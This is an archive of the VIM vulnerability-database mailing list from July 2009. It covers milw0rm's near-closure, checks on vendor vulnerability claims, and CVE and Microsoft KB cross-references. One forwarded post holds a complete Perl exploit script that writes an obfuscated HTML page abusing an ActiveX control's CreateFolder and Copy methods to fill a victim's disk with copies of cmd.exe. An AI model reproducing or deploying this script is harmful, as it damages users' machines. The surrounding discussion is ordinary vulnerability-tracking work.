From jericho at attrition.org Tue Jul 7 22:48:15 2009
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 7 Jul 2009 22:48:15 +0000 (UTC)
Subject: [VIM] bye milw0rm?!
Message-ID:

http://www.milw0rm.com/

Well, this is my goodbye header for milw0rm. I wish I had the time I did in
the past to post exploits, I just don't :(. For the past 3 months I have
actually done a pretty crappy job of getting people's work out fast enough
to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the
authors on this site. I appreciate and thank everyone for their support in
the past.

Be safe, /str0ke

From coley at linus.mitre.org Tue Jul 7 22:57:51 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 7 Jul 2009 18:57:51 -0400 (EDT)
Subject: [VIM] bye milw0rm?!
In-Reply-To:
References:
Message-ID:

say it ain't so, str0ke!

(but I'll still buy you a beer at Defcon)

- Steve

On Tue, 7 Jul 2009, security curmudgeon wrote:

>
> http://www.milw0rm.com/
>
> Well, this is my goodbye header for milw0rm. I wish I had the time I did
> in the past to post exploits, I just don't :(. For the past 3 months I
> have actually done a pretty crappy job of getting people's work out fast
> enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to
> the authors on this site. I appreciate and thank everyone for their
> support in the past.
> Be safe, /str0ke
>

From jericho at attrition.org Tue Jul 7 22:59:56 2009
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 7 Jul 2009 22:59:56 +0000 (UTC)
Subject: [VIM] bye milw0rm?!
In-Reply-To:
References:
Message-ID:

: say it ain't so, str0ke! (but I'll still buy you a beer at Defcon)

I'll buy you many, if you keep it going =)

72 hours? So what, exploit writers can learn to be patient. All of the
behind the scenes work you did in helping to weed out fakes, watch for
'reprints' and generally perform QA that the writers didn't, was
incredible.
Much rather see you do it at your own pace, than the half dozen 'new
milw0rm' sites that pop up and drop the quality.

From dennis.groves at gmail.com Tue Jul 7 23:02:49 2009
From: dennis.groves at gmail.com (Dennis Groves)
Date: Wed, 8 Jul 2009 00:02:49 +0100
Subject: [VIM] bye milw0rm?!
In-Reply-To:
References:
Message-ID: <7054e2d40907071602w1f53d592t1975cf0c7d1756f7@mail.gmail.com>

do you think you may want to let somebody else in the community take it
over?

2009/7/7 security curmudgeon

>
> http://www.milw0rm.com/
>
> Well, this is my goodbye header for milw0rm. I wish I had the time I did in
> the past to post exploits, I just don't :(. For the past 3 months I have
> actually done a pretty crappy job of getting people's work out fast enough to
> be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors
> on this site. I appreciate and thank everyone for their support in the past.
>
> Be safe, /str0ke
>

--
Dennis Groves // dennis.groves at gmail.com // +44 07878 390162

Life has its own way to push you in another direction and teach you
lessons the hard way. When looking back years later, you know everything
happened for the best. "That every event is the right one. Look closely and
you'll see. Not just the right one overall, but right. As if someone had
weighed it out with scales." - Marcus Aurelius

From str0ke at milw0rm.com Thu Jul 9 14:17:11 2009
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 09 Jul 2009 09:17:11 -0500
Subject: [VIM] bye milw0rm?!
In-Reply-To:
References:
Message-ID: <4A55FBE7.7080107@milw0rm.com>

Hey guys ya sorry for the late one on this one, was out of town when
deciding the fate of milw0rm and with all of the emails / twitters / phone
calls / txt messages, I can't just let it die.
The damn box wasn't supposed to go offline yesterday, I just couldn't log in
to restart the power after its OS took a crap from the hits :(

security curmudgeon wrote:
> : say it ain't so, str0ke! (but I'll still buy you a beer at Defcon)
>
> I'll buy you many, if you keep it going =)
>
> 72 hours? So what, exploit writers can learn to be patient. All of the
> behind the scenes work you did in helping to weed out fakes, watch for
> 'reprints' and generally perform QA that the writers didn't, was
> incredible.
>
> Much rather see you do it at your own pace, than the half dozen 'new
> milw0rm' sites that pop up and drop the quality.
>
>

From str0ke at milw0rm.com Thu Jul 9 14:21:40 2009
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 09 Jul 2009 09:21:40 -0500
Subject: [VIM] bye milw0rm?!
In-Reply-To:
References:
Message-ID: <4A55FCF4.7030201@milw0rm.com>

I guess I'll take the many. Way too many people unhappy with me over the
idea of closing shop. I just needed help which I have a lot of people to
choose from now. Damn box died yesterday from the hits and I didn't have a
stable internet connection to log in to reboot it :(

/str0ke

security curmudgeon wrote:
> : say it ain't so, str0ke! (but I'll still buy you a beer at Defcon)
>
> I'll buy you many, if you keep it going =)
>
> 72 hours? So what, exploit writers can learn to be patient. All of the
> behind the scenes work you did in helping to weed out fakes, watch for
> 'reprints' and generally perform QA that the writers didn't, was
> incredible.
>
> Much rather see you do it at your own pace, than the half dozen 'new
> milw0rm' sites that pop up and drop the quality.
>
>

From jericho at attrition.org Thu Jul 9 19:32:09 2009
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 9 Jul 2009 19:32:09 +0000 (UTC)
Subject: [VIM] bye milw0rm?!
In-Reply-To: <4A55FCF4.7030201@milw0rm.com>
References: <4A55FCF4.7030201@milw0rm.com>
Message-ID:

On Thu, 9 Jul 2009, str0ke wrote:

: I guess I'll take the many.
: Way too many people unhappy with me over the
: idea of closing shop. I just needed help which I have a lot of people to
: choose from now. Damn box died yesterday from the hits and I didn't
: have a stable internet connection to log in to reboot it :(

Just make it clear. You get submissions, you handle them as you can, on
your schedule. =)

From webapp at web-app.org Thu Jul 9 20:18:52 2009
From: webapp at web-app.org (WebAPP)
Date: Thu, 9 Jul 2009 13:18:52 -0700
Subject: [VIM] bye milw0rm?!
References: <4A55FCF4.7030201@milw0rm.com>
Message-ID: <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01>

That's a great idea and how I have been doing it for the past couple years
at my Web Directory. There are just too many to keep up with on a steady
basis. 10,000 pending? Haha I don't think so but I try to keep up where I
can.

Anyways I'm glad to hear you are staying with the site str0ke. It's a great
resource as well as you being an important contributor to the security
community and the Web Development world in general.

Thanks for all you have done.

Jos Brown

----- Original Message -----
From: "security curmudgeon"
To: "Vulnerability Information Managers"
Sent: Thursday, July 09, 2009 12:32 PM
Subject: Re: [VIM] bye milw0rm?!

>
> On Thu, 9 Jul 2009, str0ke wrote:
>
> : I guess I'll take the many. Way too many people unhappy with me over the
> : idea of closing shop. I just needed help which I have a lot of people to
> : choose from now. Damn box died yesterday from the hits and I didn't
> : have a stable internet connection to log in to reboot it :(
>
> Just make it clear. You get submissions, you handle them as you can, on
> your schedule. =)
>

From dennis.groves at gmail.com Thu Jul 9 21:44:20 2009
From: dennis.groves at gmail.com (Dennis Groves)
Date: Thu, 9 Jul 2009 22:44:20 +0100
Subject: [VIM] bye milw0rm?!
In-Reply-To: <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01>
References: <4A55FCF4.7030201@milw0rm.com> <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01>
Message-ID: <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com>

str0ke, I am glad to see the resource remain - it is really a very
generous and important contribution to the field of security. Thank you.

Perhaps you could automate the task, and/or open up the site to volunteers
(you trust) to validate and approve issues for the site to help with the
backlog and allow you to step away when it gets overwhelming?

Cheers,
Dennis

Dennis Groves // dennis.groves at gmail.com // +44 07878 390162

Life has its own way to push you in another direction and teach you
lessons the hard way. When looking back years later, you know everything
happened for the best. "That every event is the right one. Look closely and
you'll see. Not just the right one overall, but right. As if someone had
weighed it out with scales." - Marcus Aurelius

On Thu, Jul 9, 2009 at 9:18 PM, WebAPP wrote:

> That's a great idea and how I have been doing it for the past couple years
> at my Web Directory. There are just too many to keep up with on a steady
> basis. 10,000 pending? Haha I don't think so but I try to keep up where I
> can.
>
> Anyways I'm glad to hear you are staying with the site str0ke. It's a great
> resource as well as you being an important contributor to the security
> community and the Web Development world in general.
>
> Thanks for all you have done.
>
> Jos Brown
>
> ----- Original Message ----- From: "security curmudgeon"
>
> To: "Vulnerability Information Managers"
> Sent: Thursday, July 09, 2009 12:32 PM
> Subject: Re: [VIM] bye milw0rm?!
>
>
>>
>> On Thu, 9 Jul 2009, str0ke wrote:
>>
>> : I guess I'll take the many. Way too many people unhappy with me over the
>> : idea of closing shop. I just needed help which I have a lot of people to
>> : choose from now.
>> : Damn box died yesterday from the hits and I didn't
>> : have a stable internet connection to log in to reboot it :(
>>
>> Just make it clear. You get submissions, you handle them as you can, on
>> your schedule. =)
>>
>
>

From coley at linus.mitre.org Thu Jul 9 22:12:11 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 9 Jul 2009 18:12:11 -0400 (EDT)
Subject: [VIM] bye milw0rm?!
In-Reply-To: <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com>
References: <4A55FCF4.7030201@milw0rm.com> <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01> <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com>
Message-ID:

str0ke,

Glad to hear that milw0rm will continue in one form or another! It's
become an extremely valuable resource for publication of new issues for
everybody, including CVE. And we all benefit from all the work you do
behind the scenes to ensure that the information you let through doesn't
suck.

milw0rm references are in about 35% of the 8700+ CVE's we've published
since January 2008, and it was the *only* source of raw vulnerability
information in about 20% to 30% of published CVEs in that time frame (this
number includes working exploits). i.e., there was a ton of stuff on your
site that wasn't on any other site (or list) that we regularly monitored.
No doubt that the presence of milw0rm contributed significantly to the CVE
trends that show the rise of web application vulnerabilities.

Whether you're quoting folk singer Joni Mitchell or 80's metal rockers, the
phrase "don't know what you got till it's gone" comes to mind.

Thank you,
Steve

From str0ke at milw0rm.com Thu Jul 9 23:27:04 2009
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 09 Jul 2009 18:27:04 -0500
Subject: [VIM] EZNewsletter V3 Arbitrary Database Disclosure Vulnerability
Message-ID: <4A567CC8.8080601@milw0rm.com>

I received this in the past and it shouldn't be counted as a vuln.
readme.txt

*****************************************************
* WARNING         #SECURITY NOTICE#         WARNING *
*                                                   *
* I STRONGLY urge you to either rename the          *
* database or put the database in a folder          *
* outside your root folder.                         *
*                                                   *
* If you dont, you run the risk of someone          *
* accessing your database and getting your          *
* login info.                                       *
* This is true for all MS Access databases          *
*                                                   *
*****************************************************

From ryan at thievco.com Tue Jul 14 01:10:38 2009
From: ryan at thievco.com (Ryan Russell)
Date: Mon, 13 Jul 2009 18:10:38 -0700
Subject: [VIM] [Fwd: FileRun vulns]
Message-ID: <4A5BDB0E.9040305@thievco.com>

Am told this is a multi-maintainer vuln info list. Apologies in advance if
I'm mailing the wrong folks.

Ryan

-------- Original Message --------
Subject: FileRun vulns
Date: Mon, 13 Jul 2009 16:54:55 -0700
From: Ryan Russell
To: OSVDB Manglers

I have a "vendor response" from FileRun:

"Those vulnerabilities were published in February 2007 by
"pridels0.blogspot.com" and taken over by "http://secunia.com/". Since
then, this information was copied by all kind of websites with
information on software vulnerabilities. Anyway, they were affecting the
public demo that was on display and were fixed in the first FileRun
major version (1.0).

Feel free to get back to us at any time.

Best regards,
FileRun Support Team
http://www.filerun.com"

Covering these:
http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles

I can't even see what the original vuln claim is. I have a copy running, I
happen to be trying to use it for the day job. What would the procedure be?
Ryan

From steve at vitriol.net Tue Jul 14 13:58:39 2009
From: steve at vitriol.net (Steve Tornio)
Date: Tue, 14 Jul 2009 08:58:39 -0500
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To: <4A5BD066.50605@thievco.com>
References: <4A5BD066.50605@thievco.com>
Message-ID:

On Mon, Jul 13, 2009 at 7:25 PM, Ryan Russell wrote:

> I have a "vendor response" from FileRun:
> "Those vulnerabilities were published in February 2007 by
> "pridels0.blogspot.com" and taken over by "http://secunia.com/". Since
> then, this information was copied by all kind of websites with
> information on software vulnerabilities. Anyway, they were affecting the
> public demo that was on display and were fixed in the first FileRun
> major version (1.0).
>

It looks like Secunia (and the rest of us) borked the link. The original
report can be viewed at http://pridels0.blogspot.com/2007/05/filerun-vuln.html

r0t claims that 1.0 and earlier are affected, so that seems to be at odds
with the vendor response. Are you able to verify whether 1.0 is vulnerable?

> Covering these:
> http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles

I'm going to update our entries with the new advisory URL. If you come up
with any additional info, feel free to forward it on, or mangle it up and
we'll push out the update.

Thanks,
Steve
osvdb.org

From coley at linus.mitre.org Tue Jul 14 18:26:46 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 14 Jul 2009 14:26:46 -0400 (EDT)
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To:
References: <4A5BD066.50605@thievco.com>
Message-ID:

On Tue, 14 Jul 2009, Steve Tornio wrote:

> r0t claims that 1.0 and earlier are affected, so that seems to be at odds
> with the vendor response. Are you able to verify whether 1.0 is vulnerable?
r0t would only test the most obvious software downloads and/or the online
demos, so I'd take his claims of affected versions with a large grain of
salt.

(Steve, note that your posts are also going to the public VIM list)

Thanks for forwarding this, Ryan.

- Steve

> Covering these:
> > http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles
>
>
>
> I'm going to update our entries with the new advisory URL. If you come up
> with any additional info, feel free to forward it on, or mangle it up and
> we'll push out the update.
>
> Thanks,
> Steve
> osvdb.org
>

From cji at attrition.org Tue Jul 14 18:44:14 2009
From: cji at attrition.org (cji)
Date: Tue, 14 Jul 2009 18:44:14 +0000 (UTC)
Subject: [VIM] MS09-032 and Office Web Component ActiveX
Message-ID:

MS09-032 is listed as addressing CVE-2008-0015.
http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx

However, the KB article for the Office Web Components issue lists MS09-032
as addressing that issue as well. Copy/paste error, or does it include the
kill bit for that?
http://support.microsoft.com/kb/973472

(Note the technet advisory for the OWC issue still says use the workaround
- but then links to the KB article saying MS09-032 addresses it -
http://www.microsoft.com/technet/security/advisory/973472.mspx).

Thank you,
Craig

From steve at vitriol.net Tue Jul 14 18:54:38 2009
From: steve at vitriol.net (Steve Tornio)
Date: Tue, 14 Jul 2009 13:54:38 -0500
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To:
References: <4A5BD066.50605@thievco.com>
Message-ID:

On Tue, Jul 14, 2009 at 1:26 PM, Steven M. Christey wrote:

>
> (Steve, note that your posts are also going to the public VIM list)
>

Did I post something non-public? I figured to save time by replying to his
emails to both lists at once.

I forgot about r0t's track record. The benefit of picking and choosing
which entries I work on :)

Steve
From coley at linus.mitre.org Tue Jul 14 18:57:59 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 14 Jul 2009 14:57:59 -0400 (EDT)
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To:
References: <4A5BD066.50605@thievco.com>
Message-ID:

On Tue, 14 Jul 2009, Steve Tornio wrote:

> Did I post something non-public? I figured to save time by replying to his
> emails to both lists at once.

no, your reply was very osvdb-centric (perish the thought) so it smelled
like an internal message to me.

> I forgot about r0t's track record. The benefit of picking and choosing
> which entries I work on :)

Indeed. Some of us aren't always so lucky :)

- Steve

From ryan at thievco.com Tue Jul 14 19:01:37 2009
From: ryan at thievco.com (Ryan Russell)
Date: Tue, 14 Jul 2009 12:01:37 -0700
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To:
References: <4A5BD066.50605@thievco.com>
Message-ID: <4A5CD611.1000408@thievco.com>

Ah, now I can see the original claim. Will test current version tomorrow.
I will also see what I can do about historical versions.

Ryan

Steven M. Christey wrote:
> On Tue, 14 Jul 2009, Steve Tornio wrote:
>
>> r0t claims that 1.0 and earlier are affected, so that seems to be at odds
>> with the vendor response. Are you able to verify whether 1.0 is vulnerable?
>
> r0t would only test the most obvious software downloads and/or the online
> demos, so I'd take his claims of affected versions with a large grain of
> salt.
>
> (Steve, note that your posts are also going to the public VIM list)
>
> Thanks for forwarding this, Ryan.
>
> - Steve
>
>
>> Covering these:
>>> http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles
>>
>>
>> I'm going to update our entries with the new advisory URL. If you come up
>> with any additional info, feel free to forward it on, or mangle it up and
>> we'll push out the update.
>>
>> Thanks,
>> Steve
>> osvdb.org
>>
>

From steve at vitriol.net Tue Jul 14 19:14:24 2009
From: steve at vitriol.net (Steve Tornio)
Date: Tue, 14 Jul 2009 14:14:24 -0500
Subject: [VIM] [OSVDB Mods] FileRun vulns
In-Reply-To:
References: <4A5BD066.50605@thievco.com>
Message-ID:

On Tue, Jul 14, 2009 at 1:57 PM, Steven M. Christey wrote:

>
> no, your reply was very osvdb-centric (perish the thought) so it smelled
> like an internal message to me.
>

Gotcha. I actually intended for the other VDBs to see that they had the
advisory link wrong, too. It looked like only CVE had the correct URL.

Steve

From theall at tenablesecurity.com Tue Jul 14 21:19:59 2009
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 14 Jul 2009 17:19:59 -0400
Subject: [VIM] MS09-032 and Office Web Component ActiveX
In-Reply-To:
References:
Message-ID:

On Jul 14, 2009, at 2:44 PM, cji wrote:

> However, the KB article for the Office Web Components issue lists
> MS09-032 as addressing that issue as well. Copy/paste error, or does
> it include the kill bit for that?
> http://support.microsoft.com/kb/973472
>
> (Note the technet advisory for the OWC issue still says use the
> workaround - but then links to the KB article saying MS09-032
> addresses it - http://www.microsoft.com/technet/security/advisory/973472.mspx)
> .

I'm not seeing any reference to MS09-032 in the OWC KB article, which
still appears to be at v1.0 from 7/13.

George
--
theall at tenablesecurity.com

From cji at attrition.org Tue Jul 14 22:07:32 2009
From: cji at attrition.org (cji)
Date: Tue, 14 Jul 2009 22:07:32 +0000 (UTC)
Subject: [VIM] MS09-032 and Office Web Component ActiveX
In-Reply-To:
References:
Message-ID:

Damn, should have taken a screenshot so no one thinks I'm crazy, but they
appear to have fixed it and it's showing the workaround still.
Thank you,
Craig

On Tue, 14 Jul 2009, George A. Theall wrote:

> On Jul 14, 2009, at 2:44 PM, cji wrote:
>
>> However, the KB article for the Office Web Components issue lists MS09-032
>> as addressing that issue as well. Copy/paste error, or does it include the
>> kill bit for that?
>> http://support.microsoft.com/kb/973472
>>
>> (Note the technet advisory for the OWC issue still says use the workaround
>> - but then links to the KB article saying MS09-032 addresses it -
>> http://www.microsoft.com/technet/security/advisory/973472.mspx).
>
> I'm not seeing any reference to MS09-032 in the OWC KB article, which still
> appears to be at v1.0 from 7/13.
>
> George
> --
> theall at tenablesecurity.com
>
>

From str0ke at milw0rm.com Fri Jul 17 15:27:47 2009
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 17 Jul 2009 10:27:47 -0500
Subject: [VIM] [Fwd: COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)]
Message-ID: <4A609873.6040609@milw0rm.com>

Tested this remotely and it didn't work. Target.CreateFolder wasn't
allowed.
/str0ke #!/usr/bin/perl ############################################################### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com & Http://Fereidani.ir # ############################################################### # Help : # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\ # Please enter number of copy cmd to folder (10000 or more for example) : 10000 # ** Ok comraider.html created , now you can use this ############################################################### # Tnx : Only for God ############################################################### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = ; print "Please enter number of copy cmd to folder (10000 or more for example) : "; $number = ; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0
x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$folder.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr
(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x20).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).chr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x3E); print "** OK comraider.html created , now you can use this"; open(myfile,'>>comraider.html'); print myfile $shellcode; From str0ke at milw0rm.com Fri Jul 17 18:38:28 2009 From: str0ke at milw0rm.com (str0ke) Date: Fri, 17 Jul 2009 13:38:28 -0500 
Subject: [VIM] MIL [9175] - Sguil/PADS
Message-ID: <4A60C524.6050408@milw0rm.com>

The SQL injection is false and has been moved to just a denial of service
vulnerability.

/str0ke

From jericho at attrition.org Mon Jul 20 07:27:21 2009
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 20 Jul 2009 07:27:21 +0000 (UTC)
Subject: [VIM] PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities
In-Reply-To: <40A5D9B5-A647-4B5E-B2C9-35CDEE0BFEC2@tenablesecurity.com>
References: <40A5D9B5-A647-4B5E-B2C9-35CDEE0BFEC2@tenablesecurity.com>
Message-ID:

On Wed, 15 Apr 2009, George A. Theall wrote:

: Hey str0ke, you're aware that milw0rm 8425 is rather old, aren't you?
: It's a repost of a message Sirdarckcat posted to Bugtraq in 2006 --
: http://www.securityfocus.com/archive/1/445007/30/0/threaded.
:
: I'm not sure why, but SecurityFocus created BID 34505 for the repost
: even though BID 19818 is for the issues in the original post.

I'm way behind on mail =) Which means.. Secunia noticed the same thing you
did George. Which means that when I saw the mail in my inbox, it was
'outstanding' for OSVDB. I started going through and figuring which OSVDB
refs from 2006 needed the new mail list post added, and ended up with 100%
as previously disclosed.

Jerk wasted 5 minutes of my time, so I replied to him/bugtraq. Doubt
Bugtraq will approve though =)

---

From: security curmudgeon
To: marianiscc at hotmail.com
Cc: bugtraq at securityfocus.com
Date: Mon, 20 Jul 2009 07:02:25 +0000 (UTC)
Subject: Re: PHP-Revista Multiple vulnerabilities

On Mon, 13 Apr 2009, marianiscc at hotmail.com wrote:

: Discovered by Sirdarckcat from elhacker.net

By 'discovered', you mean 'copied from the disclosure in September 2006'
right?

CVE-2006-4605 through CVE-2006-4608.

From jericho at attrition.org Mon Jul 27 01:04:49 2009
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 27 Jul 2009 01:04:49 +0000 (UTC)
Subject: [VIM] where did MS KB 953602 go?
Message-ID:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1216

As referenced there, ISS and other places. Linking to it results in 'no KB
found', and searching MS for that number gives nothing.

From jericho at attrition.org Mon Jul 27 08:33:01 2009
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 27 Jul 2009 08:33:01 +0000 (UTC)
Subject: [VIM] HP / OfO vulnerability question
Message-ID:

Hello HP,

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143

This references CVE-2008-1666, which is not referenced in the cpujul2008
Oracle update. Would you please clarify if this CVE identifier covers a
vulnerability specific to OfO, or if this bulletin only covers
vulnerabilities in the cpujul2008 advisory?

Thank you,

Brian
OSVDB.org

From coley at linus.mitre.org Mon Jul 27 14:21:47 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 27 Jul 2009 10:21:47 -0400 (EDT)
Subject: [VIM] annual VIM gathering at Black Hat / Defcon
Message-ID:

Well? Should we have another gathering?

Fridays seem to work well because we may have stragglers from Black Hat
and people coming in for Defcon. I assume that Quark's is gone. Last year
we went to some restaurant near Quark's that provided adequate food/drink
although the layout wasn't the best. On the other hand, it was right next
to the Riviera. Anybody have other suggestions?

- Steve

From john.morris at hp.com Mon Jul 27 12:56:07 2009
From: john.morris at hp.com (Morris, John R. (SSRT))
Date: Mon, 27 Jul 2009 12:56:07 +0000
